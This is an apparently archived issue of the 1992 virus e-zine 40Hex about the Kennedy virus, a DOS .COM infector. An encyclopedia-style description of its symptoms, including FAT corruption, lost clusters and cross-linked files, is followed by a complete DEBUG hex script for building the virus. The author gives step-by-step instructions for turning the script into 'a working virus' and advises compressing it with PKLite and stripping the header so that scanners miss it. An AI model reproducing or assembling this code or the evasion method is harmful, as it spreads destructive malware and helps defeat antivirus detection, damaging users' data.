home *** CD-ROM | disk | FTP | other *** search
/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / chibacity / 40hex-6.arj / 40HEX-6.007 < prev    next >
Encoding:
Text File  |  1992-04-08  |  3.7 KB  |  89 lines
  1. 40Hex Number 6 Volume 2 Issue 2                                      File 007
  2.            
  3.            
  4.      Lets see what good ole' Patty has to say about this:
  5.  
  6.  
  7.  Virus Name:  Kennedy
  8.  Aliases:     Dead Kennedy, 333, Kennedy-333
  9.  Scan ID:     [Kennedy]
  10.  V Status:    Endangered
  11.  Discovered:  April, 1990
  12.  Symptoms:    .COM growth; message on trigger dates (see text);
  13.               crosslinking of files; lost clusters; FAT corruption
  14.  Origin:      Denmark
  15.  Eff Length:  333 Bytes
  16.  Type Code:   PNCKF - Parasitic Non-Resident .COM Infector
  17.  Detection Method:  ViruScan, Pro-Scan, VirexPC, F-Prot, VirHunt 2.0+,
  18.                     NAV, IBM Scan 2.00+, AVTK 4.32+, VIRx 1.6+, CPAV 1.0+,
  19.                     Novi 1.0.1+, Sweep 2.3.1+, UTScan
  20.  Removal Instructions:  F-Prot, VirHunt 2.0+, or delete infected files
  21.  General Comments:
  22.        The Kennedy virus was isolated in April 1990.  It is a generic
  23.        infector of .COM files, including COMMAND.COM.
  24.  
  25.        This virus has three activation dates: June 6 (assassination of
  26.        Robert Kennedy 1968), November 18 (death of Joseph Kennedy 1969),
  27.        and November 22 (assassination of John F. Kennedy 1963) of any year.
  28.        On activation, the virus will display a message the following
  29.        message:
  30.  
  31.                "Kennedy is dead - long live 'The Dead Kennedys'"
  32.  
  33.        The following text strings can be found in the viral code:
  34.  
  35.                "\command.com"
  36.                "The Dead Kennedys"
  37.  
  38.        Systems infected with the Kennedy virus will experience
  39.        cross-linking of files, lost clusters, and file allocation table
  40.        errors (including messages that the file allocation table is bad).
  41.  
  42.  
  43. --------------------------------Cut Here------------------------------------
  44.  
  45. n kennedy.com
  46. e 0100  E9 0C 00 90 90 90 CD 20 4B 65 6E 6E 65 64 79 E8
  47. e 0110  00 00 5E 81 EE 0F 01 8B AC 0B 02 B4 2A CD 21 81
  48. e 0120  FA 06 06 74 28 81 FA 12 0B 74 22 81 FA 16 0B 74
  49. e 0130  1C 8D 94 0D 02 33 C9 B4 4E CD 21 72 09 E8 17 00
  50. e 0140  72 04 B4 4F EB F3 8B C5 05 03 01 FF E0 8D 94 20
  51. e 0150  02 B4 09 CD 21 EB EF B8 00 43 BA 9E 00 CD 21 89
  52. e 0160  8C 55 02 B8 01 43 33 C9 CD 21 B8 02 3D CD 21 8B
  53. e 0170  D8 B4 3F 8D 94 52 02 8B FA B9 03 00 CD 21 80 3D
  54. e 0180  E9 74 05 E8 7E 00 F8 C3 8B 55 01 89 94 0B 02 33
  55. e 0190  C9 B8 00 42 CD 21 8B D7 B9 02 00 B4 3F CD 21 81
  56. e 01A0  3D 65 64 74 DE 33 D2 33 C9 B8 02 42 CD 21 83 FA
  57. e 01B0  00 75 D0 3D E8 FD 73 CB 05 04 00 89 84 5B 02 B8
  58. e 01C0  00 57 CD 21 89 8C 57 02 89 94 59 02 B4 40 8D 94
  59. e 01D0  05 01 B9 4D 01 CD 21 72 15 B8 00 42 33 C9 BA 01
  60. e 01E0  00 CD 21 B4 40 8D 94 5B 02 B9 02 00 CD 21 8B 8C
  61. e 01F0  57 02 8B 94 59 02 B8 01 57 CD 21 B4 3E CD 21 E8
  62. e 0200  02 00 F9 C3 B8 01 43 8B 8C 55 02 CD 21 C3 03 00
  63. e 0210  2A 2E 43 4F 4D 00 5C 43 4F 4D 4D 41 4E 44 2E 43
  64. e 0220  4F 4D 00 4B 65 6E 6E 65 64 79 20 65 72 20 64 9B
  65. e 0230  64 20 2D 20 6C 91 6E 67 65 20 6C 65 76 65 20 22
  66. e 0240  54 68 65 20 44 65 61 64 20 4B 65 6E 6E 65 64 79
  67. e 0250  73 22 0D 0A 24 00 00 00 00 00 00 00 00 00 00 00
  68. e 0260  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  69. e 0270  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  70. rcx
  71. 027F
  72. w
  73. q
  74.  
  75. ---------------------------------Cut Here-----------------------------------
  76.  
  77.  
  78.   Ok there it is.  Not the most impressive virus around and its caught by just
  79. about every scan on the market, but take PKLite to it and then remove the PKLite
  80. header (Use NOLITE in this issue) and no one will be able to find it.  Anyway it
  81. gets the job done.
  82.  
  83. To make the above hex into a working file, first cut on the dotted lines.  
  84. Name the resulting file KENNEDY.TXT.
  85. Then: DEBUG < KENNEDY.TXT  and you'll have a working virus.
  86.  
  87.  
  88.                     -Instigator
  89.